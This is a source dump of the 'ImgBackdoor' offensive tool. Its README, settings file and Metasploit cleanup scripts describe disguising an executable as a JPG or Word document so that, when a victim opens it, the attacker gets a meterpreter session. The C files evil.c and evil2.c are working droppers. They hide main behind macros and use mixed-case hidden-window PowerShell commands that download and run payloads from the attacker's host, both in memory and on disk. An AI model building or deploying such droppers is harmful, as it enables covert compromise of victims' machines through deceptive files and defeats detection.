421 | rm $ApAc/$MiP.zip > /dev/null 2>&1
422 | rm $ApAc/payload.$PaLe > /dev/null 2>&1
423 | rm $ApAc/$MiP.$EtU.exe > /dev/null 2>&1
424 | rm $IPATH/bin/evilcopy.c > /dev/null 2>&1
425 | rm $IPATH/output/trigger.exe > /dev/null 2>&1
426 | sleep 2
427 | echo ""
428 | echo ${white} Codename${RedF}::${white}$CnA ${Reset};
429 | echo ${white} Author${RedF}::${white}$ken ${RedF}::${white}[Ferdi S Kennedy]${Reset};
430 | sleep 1
431 | service apache2 stop | zenity --progress --pulsate --title "PLEASE WAIT" --text="Stop apache2 webserver" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
432 | if ! [ "$NoMsF" = "YES" ]; then
433 | service postgresql stop | zenity --progress --pulsate --title "PLEASE WAIT" --text="Stop postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
434 | fi
435 | exit
436 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "[]"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright [yyyy] [name of copyright owner]
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 | 
3 |
4 | []()
5 | []()
6 | []()
7 | []()
8 |
9 | _____ ____ _ _
10 | |_ _| | _ \ | | | |
11 | | | _ __ ___ __ _| |_) | __ _ ___| | ____| | ___ ___ _ __
12 | | | | '_ ` _ \ / _` | _ < / _` |/ __| |/ / _` |/ _ \ / _ \| '__|
13 | _| |_| | | | | | (_| | |_) | (_| | (__| < (_| | (_) | (_) | |
14 | |_____|_| |_| |_|\__, |____/ \__,_|\___|_|\_\__,_|\___/ \___/|_|
15 | __/ |
16 | |___/
17 |
18 | Version release: v1.0 (Stable)
19 | Author: Ferdi S Kennedy [ kennedy69 ]
20 | Distros Supported : Linux Ubuntu, Kali, Mint, Parrot OS
21 |
22 | ## Legal Disclaimer:
23 | The author does not hold any responsibility for the bad use of this tool,
24 | remember that attacking targets without prior consent is illegal and punished by law.
25 |
26 |
27 |
28 | ## Description:
29 | This module takes one existing image.jpg and one payload.ps1 (input by user) and
30 | builds a new payload (agent.jpg.exe) that, if executed, triggers the download of
31 | the two previous files stored in apache2 (image.jpg + payload.ps1) and executes them.
32 |
33 | This module also changes the agent.exe icon to match a file.jpg, then uses the
34 | 'Hide extensions for known file types' spoof method to hide the agent.exe extension.
35 |
36 | All payloads (user input) will be downloaded from our apache2 webserver
37 | and executed into target RAM. The only extension (payload input by user)
38 | that requires to write payload to disk are .exe binaries.
39 |
40 | ## Exploitation:
41 | ImgBackdoor stores all files in apache2 webroot, zips (.zip) the agent,
42 | starts apache2 and metasploit services(handler), and provides a URL to send to
43 | target (triggers agent.zip download). As soon as the victim runs our executable,
44 | our picture will be downloaded and opened in the default picture viewer, our
45 | malicious payload will be executed, and we will get a meterpreter session.
46 |
47 | But it also stores the agent (not zipped) in the ImgBackdoor/output folder
48 | in case we wish to deliver agent.jpg.exe using a different attack vector.
49 |
50 | 'This tool also builds a cleaner.rc file to delete payloads left in target'
51 |
52 | ## Payloads accepted (user input):
53 | payload.ps1 (default) | payload.bat | payload.txt | payload.exe [Metasploit]
54 | "Edit 'settings' file before running tool to use other extensions"
55 |
56 | ## Pictures accepted (user input):
57 | All pictures with .jpg (default) | .jpeg | .png extensions (all sizes)
58 | "Edit 'settings' file before running tool to use other extensions"
59 |
60 |
61 |
62 | ## Dependencies/Limitations:
63 | xterm, zenity, apache2, mingw32[64], ResourceHacker(wine)
64 | 'Auto-installs ResourceHacker.exe under the ../.wine/Program Files/.. directories'
65 |
66 | WARNING: To change icon manually (resource hacker bypass) edit 'settings' file.
67 | WARNING: Only on Windows systems is the 2nd extension hidden (so zip it)
68 | WARNING: The agent.jpg.exe requires the input files to be in apache2 (local LAN hack)
69 | WARNING: The agent.jpg.exe uses the powershell interpreter (does not work against wine).
70 | WARNING: This tool will not accept payload (user input) arguments (eg nc.exe -lvp 127.0.0.1 555)
71 | WARNING: The ResourceHacker provided by this tool requires WINE to be set to windows 7
72 |
73 |
74 |
75 | ## Other scenarios:
76 | If you wish to use your own binary (user input - not metasploit payloads) then:
77 | 1 - Edit 'settings' file before running tool and select 'NON_MSF_PAYLOADS=YES'
78 | 2 - Select the binary extension to use
79 | **'Remember to save the settings file before continuing'** ..
80 |
81 | 3 - Run ImgBackdoor to metamorphose your binary (all files are stored in apache automatically) ..
82 | 4 - Open a new terminal and execute your binary handler to receive the connection.
83 | **HINT: This function will NOT build a cleaner.rc**
84 |
85 |
86 |
87 | ## The noob friendly function:
88 | Bypass the need to input your payload.ps1, and let ImgBackdoor take
89 | care of building the required payload.ps1 + agent.jpg.exe and configuring the handler.
90 | "With this function active, you only need to input your picture.jpg :D"
91 | Select the binary extension to use
92 | **HINT: This function allows users to build (ps1|bat|txt) payloads**
93 | **HINT: This function will NOT build .exe binaries**
94 |
95 |
96 |
97 | ## "WINE is not owned by you":
98 | If you get this message it means that you are executing ImgBackdoor
99 | as sudo and your wine installation belongs to a user (is not owned by you). To
100 | bypass this issue, just execute ImgBackdoor as the wine owner.
101 | EXAMPLE: If wine is owned by spirited_wolf, execute the tool without sudo
102 | EXAMPLE: If wine is owned by root, execute the tool as sudo
103 |
104 |
105 |
106 | ## Download/Install/Config:
107 | 1 - Download framework from github
108 | git clone https://github.com/Tsuyoken/ImgBackdoor
109 |
110 | 2 - Set file execution permissions
111 | cd ImgBackdoor
112 | sudo chmod +x *.sh
113 |
114 | 3 - Config ImgBackdoor settings
115 | nano settings
116 |
117 | 4 - Run main tool
118 | sudo ./ImgBackdoor
119 |
120 | #### WARNING: set Resource-Hacker.exe installer to 'Program Files' (not Program Files (x86))
121 |
--------------------------------------------------------------------------------
/banner:
--------------------------------------------------------------------------------
1 | ▜▘ ▛▀▖ ▌ ▌
2 | ▐ ▛▚▀▖▞▀▌▙▄▘▝▀▖▞▀▖▌▗▘▞▀▌▞▀▖▞▀▖▙▀▖
3 | ▐ ▌▐ ▌▚▄▌▌ ▌▞▀▌▌ ▖▛▚ ▌ ▌▌ ▌▌ ▌▌
4 | ▀▘▘▝ ▘▗▄▘▀▀ ▝▀▘▝▀ ▘ ▘▝▀▘▝▀ ▝▀ ▘
5 |
--------------------------------------------------------------------------------
/bin/FIE_logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/bin/FIE_logo.png
--------------------------------------------------------------------------------
/bin/cleaner.rc:
--------------------------------------------------------------------------------
1 | search -d C:\\Users\\Public -f FaaF.AssA
2 | rm C:\\Users\\Public\\FaaF.AssA
3 |
--------------------------------------------------------------------------------
/bin/cleaner2.rc:
--------------------------------------------------------------------------------
1 | migrate -n explorer.exe
2 | search -d C:\\Users\\Public -f FaaF.AssA
3 | rm C:\\Users\\Public\\FaaF.AssA
4 | search -d C:\\Users\\Public -f payload.RffR
5 | rm C:\\Users\\Public\\payload.RffR
6 |
--------------------------------------------------------------------------------
/bin/evil.c:
--------------------------------------------------------------------------------
1 | /*
2 | Author: kennedy69 [ Ferdi S Kennedy ]
3 | Credits: null byte [ Method POC ]
4 | */
5 |
6 | #include
7 | #include
8 | #include
9 | #include
10 |
/* Token-pasting helper: of its seven parameters only i, r, s and o are used,
   glued together in that order (i##r##s##o); the other four are discarded. */
#define _____(i,s,o,g,r,a,m)(i##r##s##o)
/* With the arguments (m,i,n,u,a,l,s) the kept parameters are m, a, i, n, so
   `_` expands to the identifier `main`.  The `int _()` below is therefore
   the ordinary program entry point, written so that a plain text search of
   the source for "main" does not find it. */
#define _ _____(m,i,n,u,a,l,s)
13 |
/* Program entry point (`_` is `main`, see the macros above).  The whole
   program is a single system() call, so everything happens inside the
   platform command interpreter; the `&` separators in the string are cmd.exe
   syntax.  Command and cmdlet names are spelled in mixed case (PowerShell is
   case-insensitive) so that case-sensitive string matching on e.g.
   "powershell" or "DownloadString" misses them.
   From the visible string, three hidden-window (-wIn 1 = -WindowStyle
   Hidden) PowerShell invocations run in sequence: a WebClient download of
   ScRee from the LhOsT host into C:\Users\Public, execution of that file,
   and finally an in-memory fetch-and-run of payload.EhLh via IEX
   (Invoke-Expression) without writing it to disk.
   LhOsT, ScRee and EhLh look like placeholder tokens that are substituted
   before compilation — presumably by ImgBackdoor.sh; confirm in the script.
   Analyst notes: the on-disk artefact is the dropped file under
   C:\Users\Public, and the process chain is this binary -> cmd.exe ->
   powershell.exe with a hidden window and a -Command argument.  The
   `#include` header names were lost in extraction; system() needs <stdlib.h>.
   Returns 0 regardless of what system() reported. */
int _()
{
system("PoWeRsHeLl -wIn 1 -C (nEw-ObJeCt NeT.WebClIeNt).dOwNlOaDfIlE('http://LhOsT/ScRee', 'C:\\Users\\Public\\ScRee') & pOwErShElL -wIn 1 -c C:\\Users\\Public\\ScRee & pOwErShElL -wIn 1 -c \"IEX (NeW-oBjEcT nEt.WeBClIeNt).DoWnLoAdStRiNg('http://LhOsT/payload.EhLh')\"");
return 0;
}
19 |
--------------------------------------------------------------------------------
/bin/evil2.c:
--------------------------------------------------------------------------------
1 | /*
2 | Author: Ferdi S Kennedy [ kennedy69 ]
3 | Credits: null byte [ Method POC ]
4 | */
5 |
6 | #include
7 | #include
8 | #include
9 | #include
10 |
/* Token-pasting helper: of its seven parameters only i, r, s and o are used,
   glued together in that order (i##r##s##o); the other four are discarded. */
#define _____(i,s,o,g,r,a,m)(i##r##s##o)
/* With the arguments (m,i,n,u,a,l,s) the kept parameters are m, a, i, n, so
   `_` expands to the identifier `main`.  The `int _()` below is therefore
   the ordinary program entry point, written so that a plain text search of
   the source for "main" does not find it. */
#define _ _____(m,i,n,u,a,l,s)
13 |
/* Program entry point (`_` is `main`, see the macros above).  Same
   construction as evil.c: one system() call whose string is a cmd.exe
   command line (`&` separators) built from mixed-case PowerShell names to
   evade case-sensitive string matching.
   Difference from evil.c: both files are written to disk.  ScRee is
   downloaded from the LhOsT host into C:\Users\Public and launched with
   `start`, then payload.EhLh is downloaded to the same directory and also
   launched with `start` — there is no in-memory IEX stage.  This matches
   the README's statement that .exe payloads are the only kind written to
   disk, and cleaner2.rc in this repository removes exactly these two files.
   LhOsT, ScRee and EhLh look like placeholder tokens substituted before
   compilation — presumably by ImgBackdoor.sh; confirm in the script.
   Analyst notes: two dropped files under C:\Users\Public and a process
   chain of this binary -> cmd.exe -> powershell.exe (hidden window,
   -Command) followed by the two started payloads.  The `#include` header
   names were lost in extraction; system() needs <stdlib.h>.
   Returns 0 regardless of what system() reported. */
int _()
{
system("PoWeRsHeLl -wIN 1 -C (nEw-ObJeCt NeT.WebClIeNt).DoWnLoAdFiLe('http://LhOsT/ScRee', 'C:\\Users\\Public\\ScRee') & sTaRt C:\\Users\\Public\\ScRee & pOwErShElL -wIN 1 -C (NeW-oBjEcT nEt.WeBClIeNt).dOwNlOaDfIlE('http://LhOsT/payload.EhLh', 'C:\\Users\\Public\\payload.EhLh') & StArT C:\\Users\\Public\\payload.EhLh");
return 0;
}
19 |
20 |
--------------------------------------------------------------------------------
/bin/reshacker_setup.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/bin/reshacker_setup.exe
--------------------------------------------------------------------------------
/bin/word.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/bin/word.docx
--------------------------------------------------------------------------------
/icons/JPEG-black.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/JPEG-black.ico
--------------------------------------------------------------------------------
/icons/JPEG-camera.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/JPEG-camera.ico
--------------------------------------------------------------------------------
/icons/JPEG-orange.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/JPEG-orange.ico
--------------------------------------------------------------------------------
/icons/JPEG-white.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/JPEG-white.ico
--------------------------------------------------------------------------------
/icons/JPG-Ios7.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/JPG-Ios7.ico
--------------------------------------------------------------------------------
/icons/JPG-black.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/JPG-black.ico
--------------------------------------------------------------------------------
/icons/JPG-green.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/JPG-green.ico
--------------------------------------------------------------------------------
/icons/JPG-white.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/JPG-white.ico
--------------------------------------------------------------------------------
/icons/Microsoft-Excel.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/Microsoft-Excel.ico
--------------------------------------------------------------------------------
/icons/Microsoft-Word.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/Microsoft-Word.ico
--------------------------------------------------------------------------------
/icons/PNG-black.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/PNG-black.ico
--------------------------------------------------------------------------------
/icons/PNG-simple.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/PNG-simple.ico
--------------------------------------------------------------------------------
/icons/PNG-white.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/PNG-white.ico
--------------------------------------------------------------------------------
/icons/Windows-Logo.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/Windows-Logo.ico
--------------------------------------------------------------------------------
/icons/Windows-Store.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/Windows-Store.ico
--------------------------------------------------------------------------------
/output/.set:
--------------------------------------------------------------------------------
1 | srt=nothing_stable
2 |
--------------------------------------------------------------------------------
/pictures/Linux_Communism.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/pictures/Linux_Communism.png
--------------------------------------------------------------------------------
/pictures/about_communism.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/pictures/about_communism.jpg
--------------------------------------------------------------------------------
/pictures/communist-windows.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/pictures/communist-windows.jpg
--------------------------------------------------------------------------------
/pictures/tux.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/pictures/tux.jpeg
--------------------------------------------------------------------------------
/pictures/tux_communism.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/pictures/tux_communism.jpg
--------------------------------------------------------------------------------
/pictures/tuxguevara.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/pictures/tuxguevara.png
--------------------------------------------------------------------------------
/settings:
--------------------------------------------------------------------------------
1 | ## ImgBackdoor uses by default .jpg extensions
2 | # (picture input by user) but it can be configured
3 | # to use other extensions; just change the next value.
4 | # values accepted are: jpg | jpeg | png | etc
5 | ---------------------
6 | PICTURE_EXTENSION=jpg
7 | ---------------------
8 |
9 |
10 |
11 | ## ImageBackdoor uses by default .ps1 extensions
12 | # (payload input by user) but it can be configured
13 | # to use other extensions; just change the next value.
14 | # values accepted are: ps1 | bat | txt | exe
15 | ---------------------
16 | PAYLOAD_EXTENSION=exe
17 | ---------------------
18 |
19 |
20 |
21 | ## Bypass the use of the Resource-Hacker function
22 | # This next setting allows users to bypass the
23 | # agent.jpg.exe icon (.ico) replacement.
24 | # WARNING: you will need to replace the icon manually.
25 | # values accepted are: NO or YES
26 | ------------
27 | BYPASS_RH=NO
28 | ------------
29 |
30 |
31 |
32 | ## Apache2 webroot (local) full path.
33 | # This setting is required to use the apache2
34 | # webserver to deliver agent.zip to the target.
35 | # Please check your apache2 webroot install.
36 | ----------------------------
37 | APACHE_WEBROOT=/var/www/html
38 | ----------------------------
39 |
40 |
41 |
42 | ## Use a non-metasploit payload (payload user input)
43 | # This setting allows users to metamorphose their own binary (eg netcat)
44 | # using the FakeImageExploiter tool (all files will be ported to apache)
45 | # and start the corresponding binary handler (listener) manually ..
46 | # values accepted are: NO or YES
47 | -------------------
48 | NON_MSF_PAYLOADS=NO
49 | -------------------
50 |
51 |
52 |
53 | ## THE NOOB FRIENDLY FUNCTION ..
54 | # This function forces FakeImageExploiter to build the
55 | # payload.ps1 without the user needing to build it manually.
56 | # ---
57 | # WARNING: This function will only build: ( ps1 | bat | txt ).
58 | # WARNING: This function will use the 'payload_extension=' setting.
59 | # values accepted are: NO and YES
60 | ---------------------
61 | AUTO_PAYLOAD_BUILD=NO
62 | AGENT_HANDLER_PORT=666
63 | ---------------------
64 |
65 |
66 |
67 | ## FAKE WORD DOC FUNCTION (word.docx) ..
68 | # This function allows users to change the agent icon to match a
69 | # word_doc file, and changes the extension to: agent.docx.exe
70 | # --
71 | # HINT: also select 'picture_extension=docx' and choose as image
72 | # FakeImageExploiter/bin/word.docx, so that it executes the docx
73 | # document instead of opening image.jpg
74 | # values accepted are: NO and YES
75 | ----------------
76 | FAKE_WORD_DOC=NO
77 | ----------------
78 |
79 |
80 |
81 | ## USE YOUR PUBLIC IP (to deliver payloads over wan)
82 | # This function requires the user to set up their machine as a webserver
83 | # and use their public ip addr to deliver agent.jpg.exe over wan ..
84 | # ---
85 | # To use this function we need to set 'use_public_ip=yes'
86 | # and write your public_ip value so it matches your ip addr.
87 | ----------------
88 | USE_PUBLIC_IP=NO
89 | EXTERNAL_IP=write_public_address_here
90 | ----------------
91 |
92 |
93 |
94 | ### msf postgresql database connection check ? (msfdb init)
95 | # This next setting allows users to check the msf postgresql
96 | # connection status and rebuild msfdb if it is not connected.
97 | # values accepted are: OFF or ON
98 | ---------------
99 | MSF_REBUILD=OFF
100 | ---------------
101 |
102 |
103 |
104 |
105 | _EOF
106 |
107 |
--------------------------------------------------------------------------------